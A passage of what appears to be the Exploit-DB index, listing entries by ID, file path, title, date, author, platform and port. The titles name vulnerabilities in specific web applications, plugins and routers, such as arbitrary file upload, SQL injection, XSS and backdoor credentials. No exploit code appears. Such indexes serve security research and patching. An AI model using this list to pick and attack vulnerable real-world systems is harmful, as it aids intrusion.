Vulnerabilities",2014-07-10,"Govind Singh",php,webapps, -37440,exploits/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps, -37360,exploits/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80 -37361,exploits/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps, -37363,exploits/php/webapps/37363.txt,"GeniXCMS 0.0.3 - 'register.php' SQL Injection",2015-06-24,cfreer,php,webapps,80 -37364,exploits/php/webapps/37364.txt,"Joomla! Component com_simpleimageupload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 -37369,exploits/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps, -37370,exploits/php/webapps/37370.php,"WordPress Plugin FCChat Widget 2.2.x - 'upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps, -37371,exploits/php/webapps/37371.php,"WordPress Plugin Picturesurf Gallery - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps, -37372,exploits/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps, -37373,exploits/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps, -37374,exploits/php/webapps/37374.txt,"Joomla! Component com_alphacontent - 'limitstart' SQL Injection",2012-06-10,xDarkSton3x,php,webapps, -37375,exploits/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps, -37376,exploits/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps, -37377,exploits/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps, -37378,exploits/php/webapps/37378.php,"Joomla! Component com_simpleswfupload - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps, -37379,exploits/php/webapps/37379.php,"Joomla! Component mod_artuploader - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps, -37380,exploits/php/webapps/37380.php,"Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps, -37381,exploits/php/webapps/37381.html,"Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps, -37382,exploits/php/webapps/37382.php,"Joomla! Component mod_jfancy - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps, -37383,exploits/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps, -37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",php,webapps, -37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",php,webapps, -37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",php,webapps, -37394,exploits/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Persistent Cross-Site Scripting",2015-06-26,"Marco Delai",multiple,webapps, -37395,exploits/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting",2015-06-26,"Suraj Krishnaswami",windows,webapps, -37397,exploits/php/webapps/37397.html,"SPIP 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps, -37398,exploits/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Inclusion / Arbitrary File Upload",2012-06-13,KedAns-Dz,php,webapps, -37399,exploits/php/webapps/37399.php,"WordPress Plugin Evarisk - 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps, -37403,exploits/php/webapps/37403.php,"WordPress Plugin Invit0r - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps, -37404,exploits/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Cross-Site Scripting",2012-06-17,anonymous,php,webapps, -37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps, -37407,exploits/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps, -37408,exploits/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps, -37409,exploits/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps, -37410,exploits/php/webapps/37410.php,"Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps, -37411,exploits/php/webapps/37411.txt,"WordPress Plugin ORGanizer - Multiple Vulnerabilities",2012-06-15,MustLive,php,webapps, -37412,exploits/php/webapps/37412.php,"Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps, -37413,exploits/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps, -37414,exploits/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps, -37415,exploits/php/webapps/37415.txt,"Webify (Multiple Products) - Multiple HTML Injection / Local File Inclusions",2012-06-16,snup,php,webapps, -37416,exploits/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps, -37417,exploits/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps, -37418,exploits/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps, -37419,exploits/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps, -37420,exploits/php/webapps/37420.txt,"VANA CMS - 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps, -37565,exploits/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps, -37497,exploits/php/webapps/37497.txt,"Flogr - 'tag' Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps, -37423,exploits/php/webapps/37423.txt,"DeDeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps, -37424,exploits/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps, -37425,exploits/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change",2015-06-29,"Fady Mohammed Osman",hardware,webapps, -37430,exploits/php/webapps/37430.txt,"CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps, -37431,exploits/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin - 'Uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps, -37432,exploits/php/webapps/37432.txt,"e107 Image Gallery Plugin - 'name' Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps, -37433,exploits/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting",2012-06-19,indoushka,php,webapps, -37434,exploits/php/webapps/37434.txt,"e107 Filedownload Plugin - Arbitrary File Upload / Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps, -37435,exploits/php/webapps/37435.txt,"web@all - Cross-Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps, -37436,exploits/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",php,webapps, -37437,exploits/php/webapps/37437.txt,"Coppermine Photo Gallery - 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",php,webapps, -37438,exploits/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 - Cross-Site Scripting",2012-06-21,"Sooraj K.S",php,webapps, -37439,exploits/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80 -37441,exploits/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps, -37442,exploits/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434 -37443,exploits/php/webapps/37443.txt,"Joomla! Component com_szallasok - 'id' SQL Injection",2012-06-21,CoBRa_21,php,webapps, -37444,exploits/php/webapps/37444.txt,"Cotonti - 'admin.php' SQL Injection",2012-06-22,AkaStep,php,webapps, -37445,exploits/php/webapps/37445.txt,"CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps, -37446,exploits/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,php,webapps,80 -37447,exploits/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - Cross-Site Request Forgery",2015-06-30,"Wissam Bashour",asp,webapps, -37449,exploits/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps, -37450,exploits/php/webapps/37450.txt,"Amazon S3 Uploadify Script - 'Uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps, -37451,exploits/php/webapps/37451.txt,"Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps, -37452,exploits/php/webapps/37452.txt,"WordPress Plugin Flip Book - 'PHP.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps, -37453,exploits/php/webapps/37453.php,"Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps, -37454,exploits/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps, -37499,exploits/php/webapps/37499.txt,"Phonalisa - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-07-12,"Benjamin Kunz Mejri",php,webapps, -37457,exploits/php/webapps/37457.html,"FCKEditor Core - 'Editor 'spellchecker.php'' Cross-Site Scripting",2012-06-25,"Emilio Pinna",php,webapps, -37459,exploits/php/webapps/37459.txt,"Umapresence - Local File Inclusion / Arbitrary File Deletion",2012-06-25,"Sammy FORGIT",php,webapps, -37460,exploits/php/webapps/37460.txt,"Schoolhos CMS - HTML Injection",2012-06-27,the_cyber_nuxbie,php,webapps, -37461,exploits/php/webapps/37461.txt,"DigPHP - 'dig.php' Script Remote File Disclosure",2012-06-26,"Ryuzaki Lawlet",php,webapps, -37464,exploits/php/webapps/37464.txt,"WordPress Plugin Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80 -37466,exploits/php/webapps/37466.php,"PHP-Fusion Advanced MP3 Player Infusion - 'upload.php' Arbitrary File Upload",2012-06-28,"Sammy FORGIT",php,webapps, -37467,exploits/jsp/webapps/37467.txt,"TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps, -37468,exploits/php/webapps/37468.php,"JAKCMS PRO 2.2.6 - 'uploader.php' Arbitrary File Upload",2012-06-29,"Sammy FORGIT",php,webapps, -37469,exploits/php/webapps/37469.txt,"LIOOSYS CMS - SQL Injection / Information Disclosure",2012-06-29,MustLive,php,webapps, -37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps, -37472,exploits/php/webapps/37472.php,"Getsimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps, -40676,exploits/php/webapps/40676.txt,"My Little Forum 2.3.7 - Multiple Vulnerabilities",2016-11-01,"Ashiyane Digital Security Team",php,webapps, -37474,exploits/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80 -37498,exploits/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps, -37476,exploits/php/webapps/37476.txt,"PHP MBB - Cross-Site Scripting / SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps, -37479,exploits/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injections",2012-07-04,snup,php,webapps, -37481,exploits/php/webapps/37481.txt,"WordPress Plugin SocialFit - 'msg' Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps, -37482,exploits/php/webapps/37482.txt,"WordPress Plugin custom tables - 'key' Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps, -37483,exploits/php/webapps/37483.txt,"WordPress Plugin church_admin - 'id' Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps, -37484,exploits/php/webapps/37484.txt,"WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps, -37485,exploits/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps, -37486,exploits/php/webapps/37486.txt,"sflog! - 'section' Local File Inclusion",2012-07-06,dun,php,webapps, -37488,exploits/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Open Redirection",2012-07-09,"Anastasios Monachos",asp,webapps, -37489,exploits/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injections",2012-07-09,"Stefan Schurtz",php,webapps, -37563,exploits/php/webapps/37563.html,"WordPress Plugin G-Lock Double Opt-in Manager - SQL Injection",2012-08-01,BEASTIAN,php,webapps, -37492,exploits/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Injection",2015-07-05,Vulnerability-Lab,ios,webapps, -37534,exploits/php/webapps/37534.txt,"WordPress Plugin Easy2Map 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 -37494,exploits/php/webapps/37494.txt,"WordPress Plugin S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps, -37500,exploits/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,php,webapps, -37501,exploits/php/webapps/37501.rb,"WordPress Plugin Generic - Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps, -37502,exploits/php/webapps/37502.txt,"Elite Bulletin Board - Multiple SQL Injections",2012-07-15,ToXiC,php,webapps, -37503,exploits/php/webapps/37503.txt,"Event Calender PHP - Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps, -37504,exploits/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 -37505,exploits/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps, -37506,exploits/php/webapps/37506.php,"WordPress Plugin Post Recommendations - 'abspath' Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps, -37507,exploits/php/webapps/37507.txt,"web@all - 'name' Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps, -37508,exploits/php/webapps/37508.txt,"Rama Zeiten CMS - 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps, -37509,exploits/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps, -37511,exploits/php/webapps/37511.txt,"AVA VoIP - Multiple Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",php,webapps, -37514,exploits/php/webapps/37514.txt,"WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80 -37515,exploits/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 -37516,exploits/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps, -37519,exploits/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps, -37520,exploits/php/webapps/37520.txt,"Maian Survey - '/index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps, -37521,exploits/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps, -37522,exploits/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,php,webapps, -37524,exploits/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 -37527,exploits/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",hardware,webapps, -37528,exploits/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80 -37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps, -37530,exploits/php/webapps/37530.txt,"WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 -37531,exploits/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps, -37532,exploits/hardware/webapps/37532.txt,"AirLive (Multiple Products) - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 -37533,exploits/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 -37537,exploits/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps, -37540,exploits/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' SQL Injection",2012-07-25,"Daniel Barragan",php,webapps, -37541,exploits/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps, -37544,exploits/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Open Redirection",2012-07-29,"Aung Khant",php,webapps, -37547,exploits/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps, -37548,exploits/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps, -37549,exploits/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps, -37550,exploits/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence - Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps, -37551,exploits/php/webapps/37551.txt,"phpBB - Multiple SQL Injections",2012-07-28,HauntIT,php,webapps, -37552,exploits/php/webapps/37552.txt,"JW Player - 'playerready' Cross-Site Scripting",2012-07-29,MustLive,php,webapps, -37553,exploits/php/webapps/37553.txt,"eNdonesia - 'cid' SQL Injection",2012-07-29,Crim3R,php,webapps, -37554,exploits/php/webapps/37554.txt,"Limny - 'index.php' Multiple SQL Injections",2012-07-31,L0n3ly-H34rT,php,webapps, -37555,exploits/java/webapps/37555.txt,"ManageEngine Applications Manager - Multiple SQL Injections",2012-08-01,"Ibrahim El-Sayed",java,webapps, -37556,exploits/php/webapps/37556.txt,"Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps, -37557,exploits/java/webapps/37557.txt,"ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injections",2012-08-01,"Ibrahim El-Sayed",java,webapps, -37559,exploits/php/webapps/37559.txt,"WordPress Plugin CP Image Store with Slideshow 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps, -37560,exploits/php/webapps/37560.txt,"WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps, -37567,exploits/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps, -37569,exploits/multiple/webapps/37569.txt,"ntop - 'arbfile' Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps, -37570,exploits/multiple/webapps/37570.py,"Zenoss 3.2.1 - Authenticated Remote Command Execution",2012-07-30,"Brendan Coles",multiple,webapps, -37571,exploits/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps, -37572,exploits/php/webapps/37572.txt,"Elefant CMS - 'id' Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps, -37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps, -37575,exploits/php/webapps/37575.txt,"Joomla! Component com_photo - Multiple SQL Injections",2012-08-06,"Chokri Ben Achor",php,webapps, -37577,exploits/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps, -37578,exploits/php/webapps/37578.txt,"Open Constructor - '/users/users.php?keyword' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps, -37579,exploits/php/webapps/37579.txt,"Open Constructor - '/data/file/edit.php?result' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps, -37580,exploits/php/webapps/37580.txt,"Open Constructor - 'confirm.php?q' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps, -37581,exploits/php/webapps/37581.txt,"Dir2web - '/system/src/dispatcher.php?oid' SQL Injection",2012-08-07,"Daniel Correa",php,webapps, -37582,exploits/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps, -37583,exploits/php/webapps/37583.txt,"YT-Videos Script - 'id' SQL Injection",2012-08-06,3spi0n,php,webapps, -37584,exploits/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple SQL Injections",2012-08-07,"Chris Cooper",php,webapps, -37585,exploits/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php?subject_module_id' SQL Injection",2012-08-07,"Chris Cooper",php,webapps, -37586,exploits/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,php,webapps, -37587,exploits/php/webapps/37587.txt,"Getsimple - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps, -37588,exploits/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 -37589,exploits/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps, -37590,exploits/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps, -37591,exploits/php/webapps/37591.php,"AraDown - 'id' SQL Injection",2012-08-08,G-B,php,webapps, -37592,exploits/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80 -37594,exploits/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection",2015-07-13,"ali ahmady",php,webapps,80 -37595,exploits/php/webapps/37595.txt,"phpVibe - Arbitrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80 -37596,exploits/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,php,webapps,80 -37601,exploits/php/webapps/37601.txt,"WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 -37602,exploits/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80 -37603,exploits/php/webapps/37603.txt,"WordPress Plugin CP Contact Form with Paypal 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 -37604,exploits/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80 -37622,exploits/php/webapps/37622.txt,"WordPress Plugin Download Manager Free 2.7.94 & Pro 4 - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",php,webapps, -37609,exploits/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps, -37610,exploits/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps, -37613,exploits/php/webapps/37613.txt,"phpList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps, -37614,exploits/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple SQL Injections",2012-08-08,"High-Tech Bridge",php,webapps, -37615,exploits/php/webapps/37615.txt,"PBBoard - 'member_id' Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps, -37616,exploits/php/webapps/37616.txt,"PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps, -37617,exploits/php/webapps/37617.txt,"dirLIST 0.3.0 - Local File Inclusion",2012-08-08,L0n3ly-H34rT,php,webapps, -37620,exploits/php/webapps/37620.txt,"Joomla! Component com_docman - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 -37623,exploits/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps, -37624,exploits/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps, -37625,exploits/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps, -37626,exploits/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor / Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps, -37629,exploits/php/webapps/37629.txt,"WordPress Plugin BuddyPress Activity Plus 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80 -37630,exploits/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps, -37632,exploits/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps, -37633,exploits/php/webapps/37633.txt,"mIRC - 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,php,webapps, -37634,exploits/php/webapps/37634.txt,"MindTouch DekiWiki - Multiple Local/Remote File Inclusions",2012-08-11,L0n3ly-H34rT,php,webapps, -37635,exploits/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host - Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps, -37636,exploits/php/webapps/37636.txt,"WordPress Theme ShopperPress - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps, -37637,exploits/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps, -37638,exploits/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps, -37641,exploits/php/webapps/37641.txt,"JPM Article Blog Script 6 - 'tid' Cross-Site Scripting",2012-08-21,Mr.0c3aN,php,webapps, -37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",php,webapps, 